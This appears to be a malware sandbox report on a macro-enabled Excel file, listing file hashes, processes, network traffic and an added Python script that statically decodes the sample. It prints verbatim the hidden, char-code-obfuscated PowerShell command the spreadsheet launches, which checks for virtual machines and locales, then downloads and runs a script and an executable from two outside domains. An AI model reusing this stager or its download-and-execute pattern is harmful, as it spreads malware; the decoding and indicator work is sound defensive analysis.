| Field | Value |
|---|---|
| File name | 8cc628b0f627cb32a037cb03686f117af1cf1a17303f731662a88302b8cf9f34.xlsm |
| Full analysis | https://app.any.run/tasks/02a96651-32f3-4139-ac7b-320e16496747 |
| Verdict | Malicious activity |
| Analysis date | June 19, 2019, 02:12:27 |
| OS | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit) |
| Tags | |
| Indicators | |
| MIME | application/vnd.openxmlformats-officedocument.spreadsheetml.sheet |
| File info | Microsoft Excel 2007+ |
| MD5 | 8D4BB358D07A3E8C1EE29265FD7FDE9F |
| SHA1 | 607FD2A6C1F0A0F727EF0234AE3E656510A6A644 |
| SHA256 | 8CC628B0F627CB32A037CB03686F117AF1CF1A17303F731662A88302B8CF9F34 |
| SSDEEP | 1536:lVH0IxkGawC3hskRSSuclIyTPHkDD+WZbmC2PqpMagFWk9KCPqBdCFs9iYNxga5t:lVH1WGhIRSSuclIyoDDllpMagcksOqBh |
File type identification:

| Extension | Description | Match (%) |
|---|---|---|
| .xlsm | Excel Microsoft Office Open XML Format document (with Macro) | 50.8 |
| .xlsx | Excel Microsoft Office Open XML Format document | 30 |
| .zip | Open Packaging Conventions container | 15.4 |
| .zip | ZIP compressed archive | 3.5 |
ZIP archive header (first entry):

| Field | Value |
|---|---|
| ZipRequiredVersion | 20 |
| ZipBitFlag | 0x0006 |
| ZipCompression | Deflated |
| ZipModifyDate | 1980:01:01 00:00:00 |
| ZipCRC | 0x3369e567 |
| ZipCompressedSize | 421 |
| ZipUncompressedSize | 1389 |
| ZipFileName | [Content_Types].xml |
Office document properties:

| Field | Value |
|---|---|
| Creator | Administrator |
| LastModifiedBy | Administrator |
| CreateDate | 2019:06:06 07:25:07Z |
| ModifyDate | 2019:06:13 13:04:29Z |
| Application | Microsoft Excel |
| DocSecurity | None |
| ScaleCrop | No |
| HeadingPairs | |
| TitlesOfParts | Sheet1 |
| Company | - |
| LinksUpToDate | No |
| SharedDoc | No |
| HyperlinksChanged | No |
| AppVersion | 16.03 |
Processes:

| PID | CMD | Path | Indicators | Parent process |
|---|---|---|---|---|
| 3372 | "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /dde | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | — | explorer.exe |
| 2848 | "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden -c … (full command line below) | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | | EXCEL.EXE |

Process details:

- PID 3372 (EXCEL.EXE): User: admin; Company: Microsoft Corporation; Integrity Level: MEDIUM; Description: Microsoft Excel; Version: 14.0.6024.1000
- PID 2848 (powershell.exe): User: admin; Company: Microsoft Corporation; Integrity Level: MEDIUM; Description: Windows PowerShell; Version: 6.1.7600.16385 (win7_rtm.090713-1255)

Full command line of PID 2848, recorded verbatim. The -c argument defines a one-line function that casts an integer to `[char]`, pipes a decimal char-code array through it to rebuild a script in `$ijsd`, and then executes that string with `iex`:

```powershell
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden -c function a($a){ return [char]$a; };$ijsd='';59,105,102,40,40,40,71,101,116,45,87,109,105,79,98,106,101,99,116,32,45,99,108,97,115,115,32,87,105,110,51,50,95,67,111,109,112,117,116,101,114,83,121,115,116,101,109,32,45,80,114,111,112,101,114,116,121,32,77,111,100,101,108,41,46,77,111,100,101,108,32,45,109,97,116,99,104,32,34,86,105,114,116,117,97,108,66,111,120,124,86,77,119,97,114,101,124,75,86,77,34,41,32,45,111,114,32,40,40,71,101,116,45,85,73,67,117,108,116,117,114,101,41,46,78,97,109,101,32,45,109,97,116,99,104,32,34,82,79,124,67,78,124,85,65,124,66,89,124,82,85,34,41,41,123,32,101,120,105,116,59,32,125,59,36,120,103,106,115,101,61,32,74,111,105,110,45,80,97,116,104,32,36,101,110,118,58,116,101,109,112,32,34,87,52,48,53,48,54,48,46,106,115,34,59,36,116,122,117,106,98,61,32,74,111,105,110,45,80,97,116,104,32,36,69,78,86,58,85,115,101,114,80,114,111,102,105,108,101,32,34,83,107,121,112,101,65,112,112,54,52,46,101,120,101,34,59,116,114,121,123,40,78,101,119,45,79,98,106,101,99,116,32,78,101,116,46,87,101,98,67,108,105,101,110,116,41,46,68,111,119,110,108,111,97,100,83,116,114,105,110,103,40,34,104,116,116,112,58,47,47,107,111,104,101,46,101,118,101,110,45,97,105,114,46,99,111,109,47,63,110,101,101,100,61,106,115,105,38,118,105,100,61,101,120,51,38,106,103,101,122,34,41,124,111,117,116,45,102,105,108,101,32,36,120,103,106,115,101,59,83,116,97,114,116,45,80,114,111,99,101,115,115,32,36,120,103,106,115,101,59,125,99,97,116,99,104,123,125,59,116,114,121,123,32,40,78,101,119,45,79,98,106,101,99,116,32,78,101,116,46,87,101,98,67,108,105,101,110,116,41,46,68,111,119,110,108,111,97,100,70,105,108,101,40,34,104,116,116,112,58,47,47,98,111,120,46,116,104,101,114,117,115,116,105,99,115,97,110,100,98,111,120,46,99,111,109,47,113,117,105,116,63,100,98,122,120,34,44,36,116,122,117,106,98,41,59,32,83,116,97,114,116,45,80,114,111,99,101,115,115,32,36,116,122,117,106,98,59,125,99,97,116,99,104,123,125,59,59|%{$fbwxd=a($_);$ijsd+=$fbwxd};iex $ijsd;
```
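The char-code array in the PID 2848 command line is the whole second stage; nothing else in the sample has to be run to see what it does. The Python decoder below is an added example for this page, not part of the ANY.RUN report or of the sample: it reproduces the stager's string-building step statically (no `iex`, nothing executed), then pulls the triage indicators out of the decoded script. The command line is copied verbatim from the process table above; the function names and the keys of the returned dictionary are my own.

```python
"""Static decoder for the char-code PowerShell stager launched by EXCEL.EXE.

Added example: rebuilds the string that `iex $ijsd` would have run, without
executing it, and extracts indicators (evasion gates, drop paths, URLs).
"""
from __future__ import annotations

import re

# The -c argument of PID 2848, copied from the sandbox process table.
CMDLINE = (
    "function a($a){ return [char]$a; };$ijsd='';"
    "59,105,102,40,40,40,71,101,116,45,87,109,105,79,98,106,101,99,116,32,45,99,108,97,115,115,32,87,105,110,51,50,95,67,111,109,112,117,116,101,114,83,121,115,116,101,109,32,45,80,114,111,112,101,114,116,121,32,77,111,100,101,108,41,46,77,111,100,101,108,32,45,109,97,116,99,104,32,34,86,105,114,116,117,97,108,66,111,120,124,86,77,119,97,114,101,124,75,86,77,34,41,32,45,111,114,32,"
    "40,40,71,101,116,45,85,73,67,117,108,116,117,114,101,41,46,78,97,109,101,32,45,109,97,116,99,104,32,34,82,79,124,67,78,124,85,65,124,66,89,124,82,85,34,41,41,123,32,101,120,105,116,59,32,125,59,36,120,103,106,115,101,61,32,74,111,105,110,45,80,97,116,104,32,36,101,110,118,58,116,101,109,112,32,34,87,52,48,53,48,54,48,46,106,115,34,59,"
    "36,116,122,117,106,98,61,32,74,111,105,110,45,80,97,116,104,32,36,69,78,86,58,85,115,101,114,80,114,111,102,105,108,101,32,34,83,107,121,112,101,65,112,112,54,52,46,101,120,101,34,59,116,114,121,123,40,78,101,119,45,79,98,106,101,99,116,32,78,101,116,46,87,101,98,67,108,105,101,110,116,41,46,68,111,119,110,108,111,97,100,83,116,114,105,110,103,40,34,"
    "104,116,116,112,58,47,47,107,111,104,101,46,101,118,101,110,45,97,105,114,46,99,111,109,47,63,110,101,101,100,61,106,115,105,38,118,105,100,61,101,120,51,38,106,103,101,122,34,41,124,111,117,116,45,102,105,108,101,32,36,120,103,106,115,101,59,83,116,97,114,116,45,80,114,111,99,101,115,115,32,36,120,103,106,115,101,59,125,99,97,116,99,104,123,125,59,"
    "116,114,121,123,32,40,78,101,119,45,79,98,106,101,99,116,32,78,101,116,46,87,101,98,67,108,105,101,110,116,41,46,68,111,119,110,108,111,97,100,70,105,108,101,40,34,104,116,116,112,58,47,47,98,111,120,46,116,104,101,114,117,115,116,105,99,115,97,110,100,98,111,120,46,99,111,109,47,113,117,105,116,63,100,98,122,120,34,44,36,116,122,117,106,98,41,59,32,"
    "83,116,97,114,116,45,80,114,111,99,101,115,115,32,36,116,122,117,106,98,59,125,99,97,116,99,104,123,125,59,59"
    "|%{$fbwxd=a($_);$ijsd+=$fbwxd};iex $ijsd;"
)


def extract_char_codes(cmdline: str) -> list[int]:
    """Return the longest comma-separated integer run in the command line.

    The stager pipes exactly such a run through [char], one element at a time,
    so the longest run is the encoded script.
    """
    runs = re.findall(r"\d+(?:,\d+){3,}", cmdline)
    if not runs:
        raise ValueError("no char-code array found in command line")
    return [int(n) for n in max(runs, key=len).split(",")]


def decode_char_codes(codes: list[int]) -> str:
    """Equivalent of `a($_)` applied to each element, minus the final iex."""
    for code in codes:
        if not 0 <= code <= 0x10FFFF:
            raise ValueError(f"code point out of range: {code}")
    return "".join(chr(code) for code in codes)


def extract_iocs(script: str) -> dict:
    """Pull triage-relevant pieces out of the decoded PowerShell."""
    return {
        # Regex gates the script tests before downloading anything
        # (VM model strings and UI-culture codes in this sample).
        "match_gates": re.findall(r'-match\s+"([^"]+)"', script),
        # (environment variable, file name) pairs passed to Join-Path.
        "drops": re.findall(r'Join-Path\s+\$env:(\w+)\s+"([^"]+)"', script, re.IGNORECASE),
        "urls": re.findall(r'https?://[^\s"\')]+', script),
        "exits_early": bool(re.search(r"\{\s*exit;\s*\}", script)),
    }


def analyze(cmdline: str) -> dict:
    """Decode a char-code stager and summarise it; keys are this example's own."""
    script = decode_char_codes(extract_char_codes(cmdline))
    result = extract_iocs(script)
    result["invokes_via_iex"] = bool(re.search(r"\biex\b", cmdline, re.IGNORECASE))
    result["script"] = script
    return result


if __name__ == "__main__":
    report = analyze(CMDLINE)
    print(report.pop("script"))
    for key, value in report.items():
        print(f"{key}: {value}")
```

Decoded, the stager first exits if the WMI `Win32_ComputerSystem` model matches `VirtualBox|VMware|KVM` or the UI culture name matches `RO|CN|UA|BY|RU`; the GET to kohe.even-air.com is recorded in the network tables, so that gate did not fire in this run. It then tries to write `W405060.js` under `%TEMP%` from `http://kohe.even-air.com/?need=jsi&vid=ex3&jgez` and `SkypeApp64.exe` under `%USERPROFILE%` from `http://box.therusticsandbox.com/quit?dbzx`, starting each after download, with every failure swallowed by an empty `catch`. Only the first URL appears in the HTTP, connection and DNS tables, the GET has no response code, and neither drop path appears in the modified-files table, so the second stage was not observed here; the second domain is still an indicator, since it is embedded in the stager.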
Modified files:

| PID | Process | Filename | Type | MD5 | SHA256 |
|---|---|---|---|---|---|
| 3372 | EXCEL.EXE | C:\Users\admin\AppData\Local\Temp\CVRF7CA.tmp.cvr | — | — | — |
| 2848 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\SHGY7LMVO72Y55614EF4.temp | — | — | — |
| 2848 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RF12043e.TMP | binary | 131DC75F6D4142CA9244945A91A71E8D | F17C463C77B5DA9E795770A82E0A7FB1023023F44397F6E080721E9811B2A0C4 |
| 2848 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms | binary | 131DC75F6D4142CA9244945A91A71E8D | F17C463C77B5DA9E795770A82E0A7FB1023023F44397F6E080721E9811B2A0C4 |
HTTP requests:

| PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation |
|---|---|---|---|---|---|---|---|---|---|
| 2848 | powershell.exe | GET | — | 31.214.157.24:80 | http://kohe.even-air.com/?need=jsi&vid=ex3&jgez | NL | — | — | unknown |

Connections:

| PID | Process | IP | Domain | ASN | CN | Reputation |
|---|---|---|---|---|---|---|
| 2848 | powershell.exe | 31.214.157.24:80 | kohe.even-air.com | easystores GmbH | NL | unknown |

DNS requests:

| Domain | IP | Reputation |
|---|---|---|
| kohe.even-air.com | | unknown |